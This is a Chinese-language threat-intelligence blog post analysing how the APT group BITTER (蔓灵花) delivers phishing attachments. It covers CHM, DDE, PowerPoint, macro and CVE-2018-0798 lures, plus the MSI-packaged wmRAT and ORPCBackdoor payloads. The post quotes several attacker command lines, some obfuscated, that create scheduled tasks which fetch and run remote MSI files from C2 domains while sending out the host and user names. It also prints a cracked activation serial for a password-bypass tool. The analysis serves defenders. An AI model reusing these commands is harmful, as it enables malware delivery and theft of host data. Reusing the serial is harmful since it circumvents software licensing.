APT组织“蔓灵花”近期活动分析–恶意邮件附件

APT 2个月前 admin
103 0 0

前言

最近有遇到,所以整合了一下近期”蔓灵花“组织钓鱼邮件中恶意附件执行的常见手法,包括:

  • 恶意“.chm”文件投放
  • 恶意”DDE”隐藏域代码执行
  • “.ppt”文件PowerPoint单击鼠标事件
  • 恶意宏文档
  • 公式编辑器漏洞利用

如果你刚好想了解恶意附件的执行流程,这篇文章会让你对上述的5类手法有个基本认识。后续会记录23年5月首次曝光的“蔓灵花”恶意邮件附件的后续载荷,白加”ORPCBackdoor“后门。(在此之前后续载荷见为”wmRAT“远)。

背景

蔓灵花组织,又称为BITTER、APT-C-08、苦象、T-APT-17,是一支据称有南亚背景的高级持久性威胁(APT)组织。自2013年11月起,该组织开始活跃,并主要专注于巴基斯坦和中国两国。其攻击目标主要包括政府部门、电力行业、军工业相关单位,其意图是窃取敏感资料。

一、  恶意附件手法分析

例举的五种已知的“蔓灵花”组织钓鱼手法,最终目的大都是创建计划任务定时15到25分钟请求一次C2远程加载(msiexec)恶意“.msi”文件。在请求时会带上计算机名和用户名,上线后C2后台会用计算机名和用户名创建一个空白的文件夹。攻击者会在诸多文件夹中挑选感兴趣的目标放入“.msi”文件,选中目标下次计划任务成功执行就会完成恶意的远程加载。

所以想去获取后续载荷直接访问多数时候是空的。

(一)“.chm”文件投放

大概从2021年初起,“蔓灵花”组织使用“.chm”恶意文件投递的手法就很常见,这些年又猛猛吃老本。下图是一个受控的“.gov”邮箱账号,散播携带“.chm”恶意文件压缩包附件的邮件。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

查看其包含的恶意代码如下,主要是功能是创建一个恶意的计划任务。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

每隔17分钟远程加载(msiexec)一次恶意资源,并且上传主机名和用户名,计划任务如下图。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

http://comnmsgwrapsvc.net/ver/verif.php/?h=%computername%*%username% 
http://folkmusicstreams.com/TIME/mac.php?sit=%computername%*%username%

抓取数据包如下图。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

msiexec命令远程加载是值得注意的事情。msiexec是Windows操作系统下的命令行工具,用于安装、修复、卸载Windows Installer软件包。它支持加载远程资源安装,运行时,将msi文件从远程位置下载到本地的临时目录中,并在本地落地进行安装。安装完成或发生错误,临时的msi文件将从磁盘上删除。

所以在取证时,在受检PC或服务器是找不到msi包的。但是该方法在流量分析的角度是很容易被检测,使用msiexec做远程http资源加载,http头“User-Agent”字段固定为“Windows Installer”(如上图),如果你编写检测规则,一律判定恶意,就可以检测此类的远程加载恶意行为。

后续场景就不再详细介绍,涉及手法内容介绍详尽。

(二)恶意”DDE”隐藏域代码执行

攻击者投递带有恶意DDE auto的文档。”.docx“文档打开时一片空白(也可能有其他正常的一些迷惑文字或图片信息),在选项中找到->视图->显示文档内容->域代码。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

打开之后长这样,实际上是十进制数。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

对应转ascll文本,同样是计划任务远程加载恶意msi文件。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

"cmd /c msiexec.exe /i http://nesiallservice.net/chq/stall.msi /q"

值得一提的是APT-Q-42腾云蛇组织用过类似的手法,南亚组织手法错综复杂,好几个组织搞不好就是一伙人。

(三)“.ppt”文件PowerPoint单击鼠标事件

攻击者下发恶意”.PPT“文件。在图片上设置了鼠标单击事件,同样是创建计划任务远程加载恶意msi资源。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

cmd.exe <p style=color:white> /c schtasks /create /sc minute /mo 15 /tn AudioDg /f /tr  "%coMSPec% /c start /min msiexec /i  http://farleysmxpph.com/FOXX/far.php?ptu=%computername%*%username% /qn /norestart"echo"</p><h3>继续</h3><p style=color:white>

(四)文档宏病毒

攻击者下发携带恶意宏的文件。宏文档投递数相对较少见,毕竟初次要提示用户启用与否,可能总体成功率不高。启用宏之后在开发工具–>VB编辑器中查看。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

可能存在密码校验,使用工具VBA_Password_Bypasser即可解密,注意这玩意儿要激活才能使用(激活码附后面了)。后续就可以分析其中的恶意代码功能了。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

工具激活码
Username: JekG
Serial: 000014-RE613W-5D877U-KDNY8V-ZZFZZZ-ZZZZZZ-ZWCJP9-51VJ00-800000-000000

(五)CVE-2018-0798公式编辑器漏洞

攻击者下发携带漏洞的”.xlsx”文件,在诸多公式编辑器漏洞里,CVE-2018-0798算是利用成功率比较高的。

CVE-2018-0798影响微软Office 2016、Microsoft Office 2013 Service Pack 1、Microsoft Office 2010 Service Pack 2、Microsoft Office 2016 for Mac和Microsoft Office 2011 for Mac等软件版本

这受影响的版本软件还有点难找。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

这是进程释放的详情,也是一样的创建计划任务远程恶意加载。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

"C:WindowsSystem32schtasks.exe" /create /sc MINUTE /mo 15 /TN WindowsDWMDWMCORE /TR "cmd /c start /min ms^iex^ec /i htt^p^:^//alf^ieh^eal^thc^ares^erv^ice^.^com/AL/al.php/?dt=%computername% /q" /f

二、“.MSI”文件

接下来就分析投放的“.msi”文件,两个恶意”.msi“文件释放最终远控木马方式不同。

  • 目标文件”1.msi“被系统msiexec.exe执行后,会在当前目录释放wmRAT。(用压缩包打开也可以看见)。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

其基本信息如下,这是23年2月的的wmRAT样本

APT组织“蔓灵花”近期活动分析--恶意邮件附件

  • 目标文件”2.msi“在%temp%目录下释放files.cab文件,然后解压该文件,里面包含白程序MSOutlookServices.exe和恶意文件OLMAPI32.dll,同样,使用7zip可以看到被打包在msi文件中。

APT组织“蔓灵花”近期活动分析--恶意邮件附件

三、ORPCBackdoor”白加黑“远控木马分析

这里分析的上述的白加黑手法的远控木马。执行白文件MSOutlookServices.exe时,会加载恶意文件OLMAPI32.dll,其中白文件有微软官方签名。 

APT组织“蔓灵花”近期活动分析--恶意邮件附件

MSOutlookServices.exe加载恶意OLMAPI32.dll功能函数如图。

APT组织“蔓灵花”近期活动分析--恶意邮件附件



写在一起篇幅过长,将在下一篇继续记录此远控木马分析。


原文始发于微信公众号(帅仔回忆录):APT组织“蔓灵花”近期活动分析–恶意邮件附件

版权声明:admin 发表于 2024年1月6日 上午9:01。
转载请注明:APT组织“蔓灵花”近期活动分析–恶意邮件附件 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...